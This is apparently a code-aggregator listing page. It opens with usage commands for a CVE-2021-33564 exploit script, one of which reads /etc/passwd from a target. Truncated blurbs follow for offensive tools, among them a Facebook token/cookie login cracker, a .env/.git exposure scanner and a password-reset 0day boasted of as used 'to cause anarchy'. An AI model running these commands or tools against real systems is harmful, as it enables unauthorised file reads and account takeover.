Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem).
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
For more information, please visit the blog.
dora Features Blazing fast as we are using ripgrep in backend Exploit/PoC steps for many of the API key, allowing to write a good report for bug bount
E-Crack By Aang-XD Fitur Login • Login via token facebook • Login via cookie facebook Install On Termux $ pkg update && pkg upgrade $ pkg install pyth
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than F
pywb Remote Browsers This repository provides a simple configuration for deploying any pywb with remote browsers provided by OWT/Shepherd Remote Brows
Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va
Mass .Git repository and .Env file Scan by Scarmandef Scanner to find .env file and .git repository exposure on multiple hosts Because of the response
Lazarus Research This repository publishes analysis reports and analysis tools for Operation Dream Job and Operation JTrack for Lazarus. Tools Python
AF-ShellHunter AF-ShellHunter: Auto shell lookup AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team How to pip3 ins
Animal Jam 0day No-Auth Force Password Reset via API Now patched 0day for force reseting an accounts password Used until patched to cause anarchy. Pro
mips mips is a python-based script that decodes MIPS instructions. Usage cd into mips and run python decode.py command or open decode.py to run the sc
This bug doesn’t exist on x86: Exploiting an ARM-only race condition How to exploit a double free and get a shell. "Use-After-Free for dummies" In thi
Metal Gear Online 2 decryption tool Metal Gear Online 2 (MGO2) has an additional layer of encryption for stage files. I was not able to find info abou
webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co
Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco
MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng
A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including P
Tracing URL redirects has never been easier! Usage • Download 🚩 Use Cases To see where an affiliate link ends up To see what affiliate network is bei
Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods This repository is the official implementation of Seohong Park, Jaeky
DependConfusion-X Tool is written in Python3 which allows security researcher/bug bounty hunter to scan and monitor list of hosts for Dependency Confusion.
Log4j2-intranet-scan ⚠️ 免责声明 本项目仅面向合法授权的企业安全建设行为,在使用本项目进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权 如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任 在使用本项目前,请您务
243 Dec 27, 2022
2 Dec 24, 2021
3 Nov 16, 2021
10 Jul 28, 2022
16 Sep 15, 2021
8 Jun 23, 2022
50 Sep 13, 2022
34 May 13, 2022
10 Nov 17, 2022
0 Mar 30, 2022
1.2k Dec 25, 2022
4 Sep 02, 2022
396 Jan 08, 2023
1 Dec 29, 2021
2 Jun 06, 2022
95 Dec 26, 2022
41 Nov 22, 2022
6 Aug 02, 2022
4 Dec 21, 2021
16 Dec 19, 2022